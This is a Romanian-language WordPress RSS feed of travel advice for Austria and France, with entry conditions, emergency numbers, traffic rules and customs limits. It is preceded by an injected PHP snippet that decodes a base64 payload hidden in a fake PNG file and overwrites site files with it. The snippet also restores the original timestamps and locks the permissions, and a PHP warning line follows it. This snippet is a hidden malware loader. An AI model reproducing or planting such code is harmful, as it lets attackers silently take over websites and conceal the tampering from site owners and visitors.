$wp_update_file="/home/shuffles/public_html/wp-includes/images/rss2.png"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/feed-rss2.php on line 8
Schengen – O noua atitudine https://o9atitudine.ro Un site de educare si informare in domeniul protectiei consumatorilor, protectiei mediului, contrafacerii si pirateriei Sun, 09 Sep 2012 15:00:36 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.4 https://o9atitudine.ro/wp-content/uploads/cropped-o-9-atitudine_albastru_mare-32x32.png Schengen – O noua atitudine https://o9atitudine.ro 32 32 Austria https://o9atitudine.ro/informatii_calatorie/austria/ Sun, 09 Sep 2012 11:00:12 +0000 http://o9atitudine.ro/?p=128 Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Austria.

Intrarea cetăţenilor români pe teritoriul federal austriac este permisă cu paşaportul sau cartea de identitate.

Ca particularitate, paşaportul este mult mai bine cunoscut de lucrătorii vamali, poliţişti şi funcţionarii publici locali, comparativ cu actul de identitate.

Cetăţenii români care intenţionează să rămână pe teritoriul Austriei pentru o perioadă mai lungă de 90 de zile, au obligaţia de a se înregistra la autorităţile locale, urmând să primească o dovadă pentru şedere legală (Anmeldebescheinigung). Cetăţenii români înregistraţi înainte de 2006, sunt exoneraţi de la această regulă.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste 

Terorismul este un fenomen global, nelocalizat, prin urmare nici Austria nu poate fi exclusă din faţa acestei ameninţări.


Siguranţă şi criminalitate 

Austria este o ţară cu un nivel de criminalitate scăzut, fenomenul infracţional având autori şi cetăţeni din statele central şi est europene.

Zonele cele mai expuse infracţiunilor de furt sunt marile centre comerciale (Pandorf, SCS, Salzburg) perimetrul turistic şi istoric al oraşului Viena, zonele de servicii pe autostrăzi, etc.).

Pentru orice tip de incident care afectează siguranţa persoanei sau a bunurilor, recomandăm contactarea poliţiei austriece şi informarea secţiei consulare a Ambasada României din Viena.

Numere de urgenţă:

  •  122 – serviciul de urgenţe pompieri
  •  133 – serviciul de urgenţe poliţie
  •  144 – serviciul de urgenţe salvare
  •  112 – numărul general de urgenţă (valabil în toate statele UE)


Sistemul medical 

Austria dispune de o reţea medicală performantă, repartizată uniform la nivelul landurilor federale. Ajutorul de primă urgenţă se acordă indiferent de statutul de asigurat / neasigurat.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie. Mai multe detalii găsiţi la adresele: www.cnas.ro/ şi www.ceass.ro/.

Costurile medicale pentru tratamentul acordat în unităţile spitaliceşti austriece se suportă personal, în absenţa unei accord expres al CNAS privind efectuarea tratamentului în Austria.

În cazul încheierii unei asigurări de sănătate private pe durata sejurului în Austria, este important să cunoaşteţi parteneri medicali recunoscuţi de asigurator pe plan local.

În caz de deces, certificatul eliberat de autorităţile austriece este valabil şi pe teritoriul României. Transportul decedatului nu se efectuează decât prin intermediul unei firme de pompe funebre.

Lista cu unităţile medicale din Viena este accesibilă la adresa http://www.wienkav.at/kav/spital.asp


Condiţii privind traficul auto

  • Circulaţia auto 

În Austria, circulaţia auto se efectuează pe partea dreaptă a drumului şi se aplică regula priorităţii de dreapta.

În perioada 1 noiembrie – 15 aprilie este obligatoriu ca autoturismele să fie dotate cu pneuri de iarnă.

Accesul pe autostrăzi se face în baza unei vignete, care poate fi procurată de la punctele de trecere a frontierei, de la benzinării sau de la magazinele de difuzare a presei. Preţul ei diferă în funcţie de perioada de valabilitate (76,50 euro pentru 1 an; 23,00 euro pentru 2 luni; 7,90 euro pentru 10 zile). Pentru posesorii de motociclete, costul ei este de 30,50 euro, 11,50 euro, respectiv 4,50 euro. Amenda pentru lipsa vignetei este de 120 euro. Neplata ei pe loc determină riscul de a achita o sumă şi mai mare, cuprinsă între 300 euro şi 3.000 euro.

Accesul în anumite zone turistice se face pe drumuri taxate suplimentar.

Informaţii suplimentare despre circulaţia rutieră obţineţi pe site-ul Clubul automobilistic austriac http://www.oeamtc.at/

Telefon de urgenţă: 120


  • Starea drumurilor

Starea generală a infrastructurii rutiere (autostrăzi, drumuri rapide şi drumuri naţionale) este foarte bună. În perioada concediilor de vară sunt deschise invariabil mai multe şantiere de întreţinere / modernizare a autostrăzilor, segmentele afectate fiind clar semnalizate. Pe aceste porţiuni de drum, viteza legală de circulaţie este semnificativ limitată (80 km/h, 60 km/h) şi poliţia instituie controale radar fixe / mobile.


  • Centura de siguranţă:

Centura de siguranţă este obligatorie, iar minorii până la vârsta de 12 ani trebuie să dispună de scaun special.


  • Limitele de viteză admise sunt:

– 50 km/h în localităţi

– 100 km/h pe şoselele rapide şi pe drumurile naţionale

– 130 km/h pe autostrăzi

Depăşirea limitelor de viteză, conform ultimelor reglementări, se pedepseşte cu amendă cuprinsă între 70 şi 730 euro şi suspendarea permisului de conducere. Depăşirea limitei de viteză maxim admisă cu peste 40 km/h atrage suspendarea permisului de conducere pentru o perioadă delimitată.


  • Regimul amenzilor

Contravaloarea amenzilor de circulaţie este încasata, fie pe loc de către poliţist, fie ulterior, prin intermediul autorităţii administrative locale.

În cazul în care cetăţeanul străin nu poate achita amenda pe loc sau refuză plata, poliţistul poate încasa direct o sumă ce reprezintă o garanţie sau poate ridica diverse bunuri tot ca şi garanţie, amenda urmând sa fie stabilita de către autoritatea administrativă locală, ulterior.

Cetăţeanul străin căruia i s-a ridicat o garanţie, are la dispoziţie 3 luni pentru a se prezenta la unitatea administrativ teritorială, pe raza căreia a comis contravenţia, pentru a achita contravaloarea sancţiunii şi a recupera garanţia sau pentru a contesta măsura. În caz contrar bunurile ridicate sunt scoase la licitaţie şi astfel se recuperează valoarea sancţiunii. Pentru încălcări grave ale regimului rutier garanţia poate fi chiar autoturismul cu care se deplasa contravenientul.

Există şi situaţia în care poliţistul poate lua măsura conducerii contravenientului la sediul poliţiei unde sunt întocmite documentele necesare prezentării acestuia în faţa judecătorului de serviciu. Acesta decide asupra cuantumului sancţiunii şi în cazul în care suma nu poate fi achitată, aceasta este transformată în închisoare contravenţională.

Conducerea autovehiculelor sub influenţa băuturilor alcoolice se pedepseşte cu amendă în cuantum de 150 Euro şi până la 5 500 euro şi suspendarea permisului de conducere.


  • Parcarea

În Austria toate spaţiile de parcare sunt amenajate şi marcate corespunzător. Majoritatea sunt cu plată, iar acest lucru este afişat la loc vizibil. Autobuzele pot fi parcate numai în locuri special amenajate, cu marcaje corespunzătoare.

Pentru parcările cu plată se utilizează vignete speciale (Parkpickerl), procurate de la primăriile de sector şi folosite doar de către persoanele domiciliate in Viena, sau imprimate speciale (Parkschein), care pot fi cumpărate de la reţeaua de magazine Trafik.

În cazul parcării în locuri nepermise, maşina poate fi ridicată de firme autorizate, abaterea fiind sancţionată cu plata unei amenzi. Pentru recuperarea autoturismului se suportă şi cheltuielile de tractare şi parcare a acesteia în locurile special amenajate.


  • Aspecte utile pentru conducătorii auto profesionişti

Pentru autorităţile austriece respectarea standardelor de siguranţă în circulaţie reprezintă o prioritate, orice abatere de la normele legislaţiei rutiere şi tehnice fiind sancţionată prompt.

Transportatorii de persoane trebuie să deţină licenţă pentru activitatea desfăşurată, iar conducătorii auto să respecte numărul de ore de odihnă prevăzute de lege.

Pentru transportul de mărfuri e obligatoriu să fie prezentate actele complete privind provenienţa, caracteristicile, beneficiarul transportului, neconcordanţele dintre documente şi situaţia din teren antrenând amenzi considerabile.

Cartea verde serveşte drept dovadă de asigurare recunoscută la nivel internaţional.


  • Informaţii pentru cazurile de accident de circulaţie

În caz de accident, la faţa locului se prezintă echipaje atât ale poliţiei, cât şi ale pompierilor şi salvării. În cazuri grave, persoanele accidentate sunt transportate cu elicopterul la cea mai performantă unitate medicală din apropiere.

În situaţia unui accident uşor, se completează împreună cu cealaltă parte implicată, formularul tip privind producerea accidentului, pus la dispoziţie de societăţile de asigurări. Se vor reţine elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii sale de asigurare.

Telefoane utile:

  • 112 – Serviciul urgenţe
  • 133 – serviciul de urgenţe poliţie
  • 144 – serviciul de urgenţe salvare
  • 120 – serviciul de urgenţe trafic


Utilizarea cărţilor de credit  

În Austria sunt acceptate toate tipurile de cărţi de credit europene şi nord-americane, iar utilizarea acestora este foarte frecventă. Paşaportul este şi singurul document acceptat de mediul bancar, pentru deschiderea unui cont în Austria, înfiinţarea unei societăţi comerciale, etc.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante. Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale. Antibioticele nu se eliberează decât pe bază de reţetă.


Reglementări vamale 

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia.

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Limitele cantitative pentru introducerea anumitor produse sunt:

  • ţigări: 200 bucăţi
  • 1 litru băuturi alcoolice
  • parfum 50 ml sau 250 ml apă de toaletă


Regimul animalelor de companie

Pentru Austria aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică. Animalul trebuie identificat printr-un microcip electronic.

Sursa: www.mae.ro

]]>
Franta https://o9atitudine.ro/informatii_calatorie/franta/ Sun, 09 Sep 2012 10:25:08 +0000 http://o9atitudine.ro/?p=134 Atenţionare:Obligativitatea deţinerii unui ethylotest în Franţa

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Franţa.
Intrarea în Franţa este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Doriţi să munciţi în Franţa?

Cetăţenii români care doresc să exercite o activitate profesională în Franţa sunt obligaţi să obţină în prealabil o autorizaţie de muncă, demers iniţiat în totalitate de către angajator.
Aceasta autorizaţie este însoţită de permisul de şedere pentru exercitarea de activităţi profesionale eliberat de prefectura.

Autorităţile franceze pot limita dreptul de circulaţie sau de şedere al cetăţenilor români doar in situaţia în care aceştia reprezintă o ameninţare la adresa ordinii publice, a siguranţei publice sau a sănătăţii publice.

Pentru muncitorii salariaţi, autorizaţiile de muncă vor fi eliberate fără a se lua în considerare situaţia profesiei pentru ocuparea unui loc de muncă, atunci când activitatea solicitată figurează pe lista celor 150 de profesii anexată la hotărârea Ministerului imigraţiei, integrării, identităţii naţionale si codezvoltării din 18 ianuarie 2008. Este vorba despre următoarele 15 sectoare de activitate:

  • construcţii şi lucrări publice
  • domeniul industriei hoteliere, alimentare şi al restauraţiei
  • agricultură, marină şi pescuit
  • mecanică şi prelucrarea metalelor
  • electricitate, electronică
  • transport, logistică si turism
  • industria de transformare
  • industrii uşoare (materiale uşoare, lemn, industrii grafice)
  • gestiune şi administrare întreprinderi
  • informatică
  • studii şi cercetare
  • bănci şi asigurări
  • comerţ şi vânzări
  • servicii către particulari si colectivităţi
  • sănătate, activitate socială, culturală şi sportivă

Pentru muncitorii nesalariaţi sau independenţi, dreptul de sejur este garantat de îndată ce aceştia sunt înscrişi în Registrul Comerţului, în Repertoarul Profesiilor sau în cadrul unui ordin profesional.

Pentru muncitorii detaşaţi în cadrul unei firme de prestări de servicii de către o întreprindere stabilită în România, dreptul de sejur este garantat fără ca întreprinderea prestatară să fie obligată să solicite o autorizaţie de muncă pentru salariaţii care lucrează în cadrul ei.

Absolvenţii de Master recunoscut in Franţa pot desfăşura o activitate profesională fără autorizaţie de muncă şi fără drept de şedere.

Pentru verificarea condiţiilor particulare de intrare şi şedere vă recomandăm consultarea informaţiilor oficiale furnizate de autorităţile franceze:

De asemenea, puteţi obţine informaţii suplimentare accesând site-ul http://www.muncainstrainatate.anofm.ro/


Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Franţa nu poate fi exclusă din faţa acestei ameninţări.
Cetăţenilor români care călătoresc în Franţa li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile franceze şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).


Siguranţă şi criminalitate

Franţa este o ţară cu un nivel de criminalitate redusă.
Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm contactarea celui mai apropiat birou al poliţiei, precum şi contactarea celui mai apropiat oficiul consular român.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor franceze, trebuie apelate următoarele numere de urgenţă:

  • 112 – Serviciul urgenţe
  • 17  – Poliţia
  • 15  – Serviciul medical de urgenţă (SAMU)
  • 18  – Pompieri
  • 115 – Număr pentru cei fără adăpost

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Vă recomandăm, de asemenea, sesizarea Ambasadei României de la Paris sau a oficiilor consulare române de la Strasbourg, Marsilia sau Lyon, care pot acorda asistenţa consulară în condiţiile prevăzute de lege.


Sistemul medical

Asigurarea medicală este obligatorie în Franţa.
Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.
Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.
Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele: www.cnas.ro/ şi www.ceass.ro/.

Este bine ca asigurarea medicală suplimentară să fievalabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.
Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.
În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Informaţii privind localizarea şi modul de funcţionare a unităţilor sanitare pot fi obţinute prin consultarea paginii web a Ministerului Sănătăţii al Franţei (www.sante.gouv.fr).


Condiţii privind traficul auto

  • Circulaţia auto

În Franţa, circulaţia auto se efectuează pe partea dreaptă a drumului.

Se acordă prioritate maşinilor care vin din dreapta.

  • Centura de siguranţă

Purtarea centurii de siguranţă este obligatorie. Folosirea telefonului mobil la volan este interzisă.

  • Starea drumurilor

Starea generală a drumurilor şi infrastructurii este foarte bună.

  • Parcarea

Marea majoritate a locurilor de parcare este cu plată.

Parcarea în zone interzise se sancţionează cu amenda până la 375 de euro sau cu ridicarea maşinii.

  • Aparatele anti-radar şi de detectare a radarului

In Franţa este interzisă folosirea ori simpla deţinere a aparatelor de detectare a radarelor. Fapta constituie contravenţie şi se amendează cu 1.500 euro (750 euro dacă amenda este plătită pe loc). In cazul refuzului de plata a amenzii, Codul Rutier francez prevede, de asemenea, şi reţinerea permisului de conducere şi confiscarea maşinii.

  • Permisul de conducere

Permisul de conducere valabil emis în România este recunoscut în Franţa.

  • Obligativitatea deţinerii unui etilotest

Începând cu data de 1 iulie 2012, toţi conducătorii auto în Franţa sunt obligaţi să posede un aparat pentru verificarea alcoolemiei – ethylotest. Sunt exceptaţi de la această obligaţie conducătorii vehiculelor cu motor cu 2 sau 3 roţi, având o capacitate cilindrică ce nu depăşeşte 50 cm³.

Aparatul trebuie să respecte condiţiile de valabilitate prevăzute de fabricant: data expirării şi certificarea conformităţii cu normele legale. Există două tipuri de aparate: etilotest chimic şi etilotest electronic. În general costul etilotestului chimic este de 1-2 euro, iar cel al etilotestului electronic depăşeşte 100 euro. Aceste dispozitive se pot achiziţiona atât din hipermarketuri, cât şi din magazinele de cartier. În cazul utilizării dispoztivului chimic, este preferabil să se achiziţioneze două aparate.

Începând cu data de 1 noiembrie 2012, lipsa acestui dispozitiv va fi sancţionată cu o amendă de 11 euro în cazul unui control rutier. Dispozitivul indică prezenţa alcoolului în aerul expirat. Este interzisă conducerea autovehiculelor când valoarea acestui indicator depăşeşte 0,25 mg/l.

  • Transportul rutier de mărfuri

Manipularea tahografului se sancţionează cu amendă care poate ajunge până la 30.000 EUR. De asemenea, există şi posibilitatea aplicării unei pedepse cu închisoarea de până la un an si sechestrarea autovehiculului.

  • Informaţii pentru cazurile de accident de circulaţie

În caz de accident uşor, completaţi, împreună cu cealaltă parte formularul tip pus la dispoziţie de societăţile locale de asigurări, privind producerea accidentului. Notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.

Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii române de asigurări din ţara respectivă care figurează pe Cartea verde.

Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

  • 112 – Serviciul urgenţe
  • 17 – Poliţia
  • 15 – Serviciul medical de urgenţă (SAMU)


Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).
Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.
Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi, 1 litru băuturi alcoolice, parfum 50 ml sau 250 ml apă de toaletă.
Detalii suplimentare privind reglementările vamale franceze pot fi obţinute prin intermediul paginii internet al serviciului vamal francez (www.douanes.gouv.fr).


Regimul medicamentelor
 

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.
Antibioticele nu se eliberează decât pe bază de reţetă.


Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică. Animalul trebuie identificat printr-un microcip electronic.

Atenţie! Este interzisă intrarea în Franţa a câinilor de atac asa cum sunt definiţi prin Hotărârea Interministeriala din 27.04.1999 (Staffordshire Terrier, American Staffordshire Terrier, Mastiff sau Boerbull, Tosa, Molosi).
Pentru condiţiile speciale aplicabile fiecărei categorii de animale de companie, informaţii suplimentare pot fi obţinute de la Ministerul francez al Agriculturii (e-mail: IMPORT.MCSI.DGAL@agriculture.gouv.fr) sau de la Ambasada Franţei din Bucureşti (www.ambafrance-ro.org).

Sursa: www.mae.ro

]]>